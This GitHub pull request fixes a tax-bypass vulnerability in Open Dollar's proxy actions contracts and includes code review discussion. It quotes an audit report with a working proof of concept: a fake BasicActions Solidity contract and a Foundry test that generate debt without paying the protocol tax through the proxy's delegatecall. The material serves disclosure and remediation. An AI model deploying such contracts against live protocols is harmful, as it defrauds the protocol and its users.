### PR TITLE
Fix Bypass Basic Actions Tax

### LINKED ISSUE #216: #286 Malicious users are able to bypass the Tax payment using making a Fake BasicActions Contract
> # Lines of code
> https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L181
> 
> # Vulnerability details
> ## Impact
> Users can interact with the protocol without paying any taxes
> 
> ## Proof of Concept
> Whenever a user wants to interact with the protocol (E.g: lock collateral, generate debt, repay debt, etc) he/she should make a call to their proxy contract and the proxy contract will make a delegatecall to BasicActions contract. BasicActions contract will calculate and pay the tax on every:
> 
> * _generateDebt: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L103)
> * _repayDebt: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L130)
> * _lockTokenCollateralAndGenerateDebt: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L181)
> * repayAllDebt: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L290)
> * repayDebtAndFreeTokenCollateral: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L356)
> * repayAllDebtAndFreeTokenCollateral: [Link to code](https://github.com/open-dollar/od-contracts/blob/f4f0246bb26277249c1d5afe6201d4d9096e52e6/src/contracts/proxies/actions/BasicActions.sol#L384)
> 
> Given that this is a delegatecall to BasicActions contract and it can be any other contract, a malicious user will be able to deploy a Fake BasicActions contract that doesn't contain any Tax payment mechanism and simply bypass the Tax payment.
> 
> To test the scenario please make a file named `FakeBasicActions.sol` in this path: `test/nft/anvil` and copy/paste the following contract code that has no Tax payment mechanism in it:
> 
> ```js
> // SPDX-License-Identifier: GPL-3.0
> pragma solidity 0.8.19;
> 
> import {ODSafeManager} from '@contracts/proxies/ODSafeManager.sol';
> import {ODProxy} from '@contracts/proxies/ODProxy.sol';
> 
> import {ISAFEEngine} from '@interfaces/ISAFEEngine.sol';
> import {ICoinJoin} from '@interfaces/utils/ICoinJoin.sol';
> import {ITaxCollector} from '@interfaces/ITaxCollector.sol';
> import {ICollateralJoin} from '@interfaces/utils/ICollateralJoin.sol';
> import {IERC20Metadata} from '@openzeppelin/token/ERC20/extensions/IERC20Metadata.sol';
> import {IBasicActions} from '@interfaces/proxies/actions/IBasicActions.sol';
> 
> import {Math, WAD, RAY, RAD} from '@libraries/Math.sol';
> 
> import {CommonActions} from '@contracts/proxies/actions/CommonActions.sol';
> 
> contract FakeBasicActions {
>    using Math for uint256;
> 
>   function lockTokenCollateralAndGenerateDebt(
>     address _manager,
>     address _taxCollector,
>     address _collateralJoin,
>     address _coinJoin,
>     uint256 _safeId,
>     uint256 _collateralAmount,
>     uint256 _deltaWad
>   ) public {
>     address _safeEngine = ODSafeManager(_manager).safeEngine();
>     ODSafeManager.SAFEData memory _safeInfo = ODSafeManager(_manager).safeData(_safeId);
> 
>     // Takes token amount from user's wallet and joins into the safeEngine
>     _joinCollateral(_collateralJoin, _safeInfo.safeHandler, _collateralAmount);
> 
>     // Locks token amount into the SAFE and generates debt
>     _modifySAFECollateralization(
>       _manager,
>       _safeId,
>       _collateralAmount.toInt(),
>       _getGeneratedDeltaDebt(_safeEngine, _safeInfo.collateralType, _safeInfo.safeHandler, _deltaWad)
>     );
> 
>     // Exits and transfers COIN amount to the user's address
>     _collectAndExitCoins(_manager, _coinJoin, _safeId, _deltaWad);
>   }
> 
>   function generateDebt(
>     address _manager,
>     address _taxCollector,
>     address _coinJoin,
>     uint256 _safeId,
>     uint256 _deltaWad
>   ) public {
>     address _safeEngine = ODSafeManager(_manager).safeEngine();
>     ODSafeManager.SAFEData memory _safeInfo = ODSafeManager(_manager).safeData(_safeId);
> 
>     // Generates debt in the SAFE
>     _modifySAFECollateralization(
>       _manager,
>       _safeId,
>       0,
>       _getGeneratedDeltaDebt(_safeEngine, _safeInfo.collateralType, _safeInfo.safeHandler, _deltaWad)
>     );
> 
>     // Moves the COIN amount to user's address
>     _collectAndExitCoins(_manager, _coinJoin, _safeId, _deltaWad);
>   }
> 
>   function _modifySAFECollateralization(
>     address _manager,
>     uint256 _safeId,
>     int256 _deltaCollateral,
>     int256 _deltaDebt
>   ) internal {
>     ODSafeManager(_manager).modifySAFECollateralization(_safeId, _deltaCollateral, _deltaDebt);
>   }
> 
>   function _getGeneratedDeltaDebt(
>     address _safeEngine,
>     bytes32 _cType,
>     address _safeHandler,
>     uint256 _deltaWad
>   ) internal view returns (int256 _deltaDebt) {
>     uint256 _rate = ISAFEEngine(_safeEngine).cData(_cType).accumulatedRate;
>     uint256 _coinAmount = ISAFEEngine(_safeEngine).coinBalance(_safeHandler);
> 
>     // If there was already enough COIN in the safeEngine balance, just exits it without adding more debt
>     if (_coinAmount < _deltaWad * RAY) {
>       // Calculates the needed deltaDebt so together with the existing coins in the safeEngine is enough to exit wad amount of COIN tokens
>       _deltaDebt = ((_deltaWad * RAY - _coinAmount) / _rate).toInt();
>       // This is neeeded due lack of precision. It might need to sum an extra deltaDebt wei (for the given COIN wad amount)
>       _deltaDebt = uint256(_deltaDebt) * _rate < _deltaWad * RAY ? _deltaDebt + 1 : _deltaDebt;
>     }
>   }
> 
>   function _collectAndExitCoins(address _manager, address _coinJoin, uint256 _safeId, uint256 _deltaWad) internal {
>     // Moves the COIN amount to proxy's address
>     _transferInternalCoins(_manager, _safeId, address(this), _deltaWad * RAY);
>     // Exits the COIN amount to the user's address
>     _exitSystemCoins(_coinJoin, _deltaWad * RAY);
>   }
> 
>   function _transferInternalCoins(address _manager, uint256 _safeId, address _dst, uint256 _rad) internal {
>     ODSafeManager(_manager).transferInternalCoins(_safeId, _dst, _rad);
>   }
> 
>   function _exitSystemCoins(address _coinJoin, uint256 _coinsToExit) internal virtual {
>     if (_coinsToExit == 0) return;
> 
>     ICoinJoin __coinJoin = ICoinJoin(_coinJoin);
>     ISAFEEngine __safeEngine = __coinJoin.safeEngine();
> 
>     if (!__safeEngine.canModifySAFE(address(this), _coinJoin)) {
>       __safeEngine.approveSAFEModification(_coinJoin);
>     }
> 
>     // transfer all coins to msg.sender (proxy shouldn't hold any system coins)
>     __coinJoin.exit(msg.sender, _coinsToExit / RAY);
>   }
> 
>   function _joinCollateral(address _collateralJoin, address _safe, uint256 _wad) internal {
>     ICollateralJoin __collateralJoin = ICollateralJoin(_collateralJoin);
>     IERC20Metadata _token = __collateralJoin.collateral();
> 
>     // Transforms the token amount into ERC20 native decimals
>     uint256 _decimals = _token.decimals();
>     uint256 _wei = _wad / 10 ** (18 - _decimals);
>     if (_wei == 0) return;
> 
>     // Gets token from the user's wallet
>     _token.transferFrom(msg.sender, address(this), _wei);
>     // Approves adapter to take the token amount
>     _token.approve(_collateralJoin, _wei);
>     // Joins token collateral into the safeEngine
>     __collateralJoin.join(_safe, _wei);
>   }
>   
> }
> ```
> 
> And also make another file called `NinjaTests.t.sol` in this path: `test/nft/anvil` and copy/paste the following test code in it:
> 
> ```js
> // SPDX-License-Identifier: GPL-3.0
> pragma solidity 0.8.19;
> import 'forge-std/Test.sol';
> import {AnvilFork} from '@test/nft/anvil/AnvilFork.t.sol';
> import {WSTETH, ARB, CBETH, RETH, MAGIC} from '@script/GoerliParams.s.sol';
> import {IERC20} from '@openzeppelin/token/ERC20/IERC20.sol';
> import {SafeERC20} from '@openzeppelin/token/ERC20/utils/SafeERC20.sol';
> import {Vault721} from '@contracts/proxies/Vault721.sol';
> import {IODSafeManager} from '@interfaces/proxies/IODSafeManager.sol';
> import {ISAFEEngine} from '@interfaces/ISAFEEngine.sol';
> import {ODSafeManager} from '@contracts/proxies/ODSafeManager.sol';
> import {ODProxy} from '@contracts/proxies/ODProxy.sol';
> import {FakeBasicActions} from '@test/nft/anvil/FakeBasicActions.sol';
> 
> contract NinjaTests is AnvilFork {
>   using SafeERC20 for IERC20;
> 
>   FakeBasicActions fakeBasicActions;
> 
>   function test_setup() public {
>     assertEq(totalVaults, vault721.totalSupply());
>     checkProxyAddress();
>     checkVaultIds();
>   }
> 
>   function test_GenerateDebtWithoutTax() public {
>     fakeBasicActions = new FakeBasicActions();
>     address proxy = proxies[1];
>     bytes32 cType = cTypes[1];
>     uint256 vaultId = vaultIds[proxy][cType];
> 
>     bytes memory payload = abi.encodeWithSelector(
>       fakeBasicActions.lockTokenCollateralAndGenerateDebt.selector,
>       address(safeManager),
>       address(taxCollector),
>       address(collateralJoin[cType]),
>       address(coinJoin),
>       vaultId,
>       1,
>       0
>     );
>     vm.startPrank(users[1]);
> 
>     // Proxy makes a delegatecall to Malicious BasicAction contract and bypasses the TAX payment
>     ODProxy(proxy).execute(address(fakeBasicActions), payload);
>     genDebt(vaultId, 10, proxy);
>     
>     vm.stopPrank();
> 
>     IODSafeManager.SAFEData memory sData = safeManager.safeData(vaultId);
>     address safeHandler = sData.safeHandler;
>     ISAFEEngine.SAFE memory SafeEngineData = safeEngine.safes(cType, safeHandler);
>     assertEq(1, SafeEngineData.lockedCollateral);
>     assertEq(10, SafeEngineData.generatedDebt);
>   }
> }
> ```
> 
> Test commands: `forge test --fork-url $ANVIL_RPC --match-test test_GenerateDebtWithoutTax`
> 
> ## Tools Used
> VSCode Foundry
> 
> ## Recommended Mitigation Steps
> Move the Tax payment mechanism into ODSafeManager contract E.g:
> 
> ```diff
>   function modifySAFECollateralization(
>     uint256 _safe,
>     int256 _deltaCollateral,
>     int256 _deltaDebt
>   ) external safeAllowed(_safe) {
> +   ODSafeManager.SAFEData memory _safeInfo = _safeData[_safe];
> +   ITaxCollector(_taxCollector).taxSingle(_safeInfo.collateralType);
>     SAFEData memory _sData = _safeData[_safe];
>     ISAFEEngine(safeEngine).modifySAFECollateralization(
>       _sData.collateralType, _sData.safeHandler, _sData.safeHandler, _sData.safeHandler, _deltaCollateral, _deltaDebt
>     );
>     emit ModifySAFECollateralization(msg.sender, _safe, _deltaCollateral, _deltaDebt);
>   }
> ```
> 
> ## Assessed type
> call/delegatecall

### PR DESCRIPTION
**Pull request by 0xdavinchee**
- Remove taxSingle from `BasicActions.sol`
- Hardcoded `taxCollector` in `ODSafeManager`
  - No more passing taxCollector as params anywhere
- Explicitly use safeHandler or msg.sender (address(this)) as the collateral source and debt destination specifically for `repayAllDebt`

closes #216

### CODE REVIEW

**Comment by 0xdavinchee** [comment]
on hold atm after meeting w/ @daopunk

File: src/contracts/proxies/actions/BasicActions.sol [hunk 1]
```diff
@@ -299,14 +299,7 @@ contract BasicActions is CommonActions, IBasicActions {
...
     // Paybacks debt to the SAFE (allowed because reducing debt of the SAFE)
-    ISAFEEngine(_safeEngine).modifySAFECollateralization({
-      _cType: _safeInfo.collateralType,
-      _safe: _safeInfo.safeHandler,
-      _collateralSource: address(this),
-      _debtDestination: address(this),
-      _deltaCollateral: 0,
-      _deltaDebt: -int256(_safeData.generatedDebt)
-    });
+    _modifySAFECollateralization(_manager, _taxCollector, _safeId, 0, -_safeData.generatedDebt.toInt());
```
Comment (0xdavinchee) [inline src/contracts/proxies/actions/BasicActions.sol:310]: Is `_sData.safeHandler` (what it is now) in place of `address(this)` (what it was previously) for `_collateralSource` and `_debtDestination` correct here?

File: src/contracts/proxies/ODSafeManager.sol [hunk 2]
```diff
@@ -153,11 +154,15 @@ contract ODSafeManager is IODSafeManager {
 
   /// @inheritdoc IODSafeManager
   function modifySAFECollateralization(
+    address _taxCollector,
```
Comment (0xdavinchee) [inline src/contracts/proxies/ODSafeManager.sol:162]: Note that taxCollector can be an arbitrary address inputted by the user still (this was also the case previously in the different functions in `BasicActions.sol`)
So if the tax collector can be multiple addresses, we should either check it is
a valid taxCollector OR if there is only one and we have discoverability,
we should query it here and use that here instead of taking it as a param and remove the `_taxCollector` param here as well as in `BasicActions.sol` to reduce calldata gas costs and another way for users to bypass the tax.

File: src/contracts/proxies/actions/BasicActions.sol [hunk 3]
```diff
@@ -276,21 +239,17 @@ contract BasicActions is CommonActions, IBasicActions {
...
-  function repayAllDebt(
-    address _manager,
-    address _taxCollector,
-    address _coinJoin,
-    uint256 _safeId
-  ) external delegateCall {
+  function repayAllDebt(address _manager, address _coinJoin, uint256 _safeId) external delegateCall {
     address _safeEngine = ODSafeManager(_manager).safeEngine();
     ODSafeManager.SAFEData memory _safeInfo = ODSafeManager(_manager).safeData(_safeId);
-    ITaxCollector(_taxCollector).taxSingle(_safeInfo.collateralType);
```
Comment (daopunk) [inline src/contracts/proxies/actions/BasicActions.sol:253]: is there still a tax here since the call is going directly to SafeENGINE?

File: src/contracts/proxies/ODSafeManager.sol [hunk 4]
```diff
@@ -160,11 +164,17 @@ contract ODSafeManager is IODSafeManager {
...
     int256 _deltaCollateral,
-    int256 _deltaDebt
+    int256 _deltaDebt,
+    bool _useSafeHandlerAddress
   ) external safeAllowed(_safe) {
     SAFEData memory _sData = _safeData[_safe];
+    if (_deltaDebt != 0) {
+      ITaxCollector(taxCollector).taxSingle(_sData.collateralType);
+    }
+    address collateralSource = _useSafeHandlerAddress ? _sData.safeHandler : msg.sender;
```
Comment (daopunk) [inline src/contracts/proxies/ODSafeManager.sol:174]: can you reverse this check:
`bool _nonSafeHandlerAddress` so the default, using the safeHandler, will be zero. it will be slightly more gas efficient to not pass non-zero

**Review by daopunk — CHANGES_REQUESTED** [review]

File: src/contracts/proxies/actions/BasicActions.sol (hunk 3 above)
Comment (0xdavinchee) [reply src/contracts/proxies/actions/BasicActions.sol:253]: we are still executing the call via the ODSafeManager here, so it will still be taxed - if we were executing the call directly to SAFEEngine, then there would be no tax.

**Review by daopunk — APPROVED** [review]

File: src/contracts/proxies/actions/BasicActions.sol [hunk 5]
```diff
@@ -178,20 +159,14 @@ contract BasicActions is CommonActions, IBasicActions {
...
     int256 deltaDebt = _getGeneratedDeltaDebt(_safeEngine, _safeInfo.collateralType, _safeInfo.safeHandler, _deltaWad);
 
     // Locks token amount into the SAFE and generates debt
-    _modifySAFECollateralization(
-      _manager,
-      _safeId,
-      _collateralAmount.toInt(),
-      deltaDebt
-    );
+    _modifySAFECollateralization(_manager, _safeId, _collateralAmount.toInt(), deltaDebt, false);
```
Comment (pi0neerpat) [inline src/contracts/proxies/actions/BasicActions.sol:169]: Is there any impact to moving `taxSingle` via `_modifySAFECollateralization ` to _after_ `_getGeneratedDeltaDebt`, `_joinCollateral`?

File: src/contracts/proxies/ODSafeManager.sol [hunk 6]
```diff
@@ -169,11 +173,17 @@ contract ODSafeManager is IODSafeManager {
...
   ) external safeAllowed(_safe) {
     SAFEData memory _sData = _safeData[_safe];
+    if (_deltaDebt != 0) {
+      ITaxCollector(taxCollector).taxSingle(_sData.collateralType);
+    }
+    address collateralSource = _nonSafeHandlerAddress ? msg.sender : _sData.safeHandler;
+    address debtDestination = collateralSource;
     ISAFEEngine(safeEngine).modifySAFECollateralization(
-      _sData.collateralType, _sData.safeHandler, _sData.safeHandler, _sData.safeHandler, _deltaCollateral, _deltaDebt
+      _sData.collateralType, _sData.safeHandler, collateralSource, debtDestination, _deltaCollateral, _deltaDebt
```
Comment (pi0neerpat) [inline src/contracts/proxies/ODSafeManager.sol:186]: Is there any danger with allowing the user to select the incorrect value for `_nonSafeHandlerAddress`?

Maybe lets add some testing (in another issue) to test these edge cases.

File: test/testlocal/nft/anvil/FakeBasicActions.sol [hunk 7]
```diff
@@ -0,0 +1,134 @@
+// SPDX-License-Identifier: GPL-3.0
```
Comment (pi0neerpat) [inline test/testlocal/nft/anvil/FakeBasicActions.sol:1]: Can you please add some documentation to understand why this file is included? Maybe a reference to the relevant issue

**Review by pi0neerpat — APPROVED** [review]

File: src/contracts/proxies/ODSafeManager.sol (hunk 6 above)
Comment (0xdavinchee) [reply src/contracts/proxies/ODSafeManager.sol:186]: There is no danger for the protocol, but it's possible the transaction will simply revert.

File: test/testlocal/nft/anvil/FakeBasicActions.sol (hunk 7 above)
Comment (0xdavinchee) [reply test/testlocal/nft/anvil/FakeBasicActions.sol:1]: added some information to the file, it was originally part of the PoC for the issue.

File: src/contracts/proxies/actions/BasicActions.sol (hunk 5 above)
Comment (0xdavinchee) [reply src/contracts/proxies/actions/BasicActions.sol:169]: good question! I did a bit of digging.

This change moves taxCollector.taxSingle from before `_joinCollateral ` and `_getGeneratedDeltaDebt`.

Therefore, we must check whether taxSingle impacts any state which `_joinCollateral ` and `_getGeneratedDeltaDebt` might read from or vice versa.

That is, we want to check if the order of operations are important due to dependency of state from either side.

**taxCollector.taxSingle**
- might call `safeEngine.updateAccumulatedRate` via `_splitTaxIncome` via `_distributeTax` 
  - This updates `__cData.accumulatedRate` in `SafeEngine` 
  - `_modifyInternalCoins` is also called in `safeEngine.updateAccumulatedRate` and `coinBalance[_dst]` and `globalDebt` are modified

**BasicActions._joinCollateral**
- transfers some token from the msg.sender to the contract
- approve collateral join contract and call collateralJoin.join which calls `safeEngine.modifyCollateralBalance`
  - this modifies: `tokenCollateral[_cType][_account]`

**BasicActions._getGeneratedDeltaDebt**
- This function retrieves: `ISAFEEngine(_safeEngine).coinBalance(_safeHandler);` and `ISAFEEngine(_safeEngine).cData(_cType).accumulatedRate`
- These are both modified in the `taxSingle` function, which previously did the following:
  - accumulated rate is increased (assuming `_currentTaxCut` is always positive)
  - `_modifyInternalCoins` also increments coinBalance

This means that moving tax single after will result in a larger value from `_getGeneratedDeltaDebt` after this change. Part of `_getGeneratedDeltaDebt`:
```
uint256 _rate = ISAFEEngine(_safeEngine).cData(_cType).accumulatedRate;
uint256 _coinAmount = ISAFEEngine(_safeEngine).coinBalance(_safeHandler);
 // Calculates the needed deltaDebt so together with the existing coins in the safeEngine is enough to exit wad amount of COIN tokens
 _deltaDebt = ((_deltaWad * RAY - _coinAmount) / _rate).toInt();
 // This is neeeded due lack of precision. It might need to sum an extra deltaDebt wei (for the given COIN wad amount)
 _deltaDebt = uint256(_deltaDebt) * _rate < _deltaWad * RAY ? _deltaDebt + 1 : _deltaDebt;
```

Previously `taxSingle` would increase the value of `_rate` and `_coinAmount` which would reduce the `_deltaDebt` value.

I can't say for certain what impact this would have on the system-it would be a lot easier to see if there are some issues with the changes if the tests were working.

**Comment by daopunk** [comment]
@0xdavinchee can you merge this since you've addressed the final comments
